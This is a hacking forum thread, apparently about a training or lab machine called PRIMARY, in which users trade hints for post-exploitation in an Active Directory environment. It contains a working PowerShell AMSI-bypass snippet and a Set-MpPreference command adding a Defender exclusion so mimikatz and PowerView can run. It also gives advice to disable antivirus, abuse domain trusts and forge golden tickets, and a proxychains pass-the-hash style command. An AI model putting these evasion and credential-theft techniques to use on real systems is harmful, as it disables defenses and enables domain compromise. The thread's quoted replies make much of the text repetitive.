[david30]

Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?

[iiNovaCore]

Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?

abuse AD trusts and get a golden ticket
https://mvc1009.github.io/hackingnotes/a...t-attacks/

[osamy7593]

Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?

abuse AD trusts and get a golden ticket
https://mvc1009.github.io/hackingnotes/a...t-attacks/

what after get system in proxychains4 -u  administrator -i 10.0.0.10 - H '' ........... "

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[Leonzola]

im stuck on ntauthority in PRIMARY

does anyone know where to go from here?

i can't run mimikatz, tried to obfuscate it doesn't work

I have tried many meterpreter shells those all get blocked.

i have a shell as ntauthority but no clue what to do at this point.

disable AV and go from there

[osamy7593]

guys any hint after nauthority with evil-winrm

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[maggi]

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

[osamy7593]

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

---

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[maggi]

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

---

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like

[osamy7593]

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

---

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like

Yes this works too bypassing amsi .. Ok what u got

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[maggi]

guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

---

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like

Yes this works too bypassing amsi .. Ok what u got

I have been readin the stuff on cross forest attacks....it is not quite clicking yet; well I don'tknow if I am messing up bloodhound anal-sis or I am plain illiterate glosing over soemthing in the readings

Direction              : BiDirectional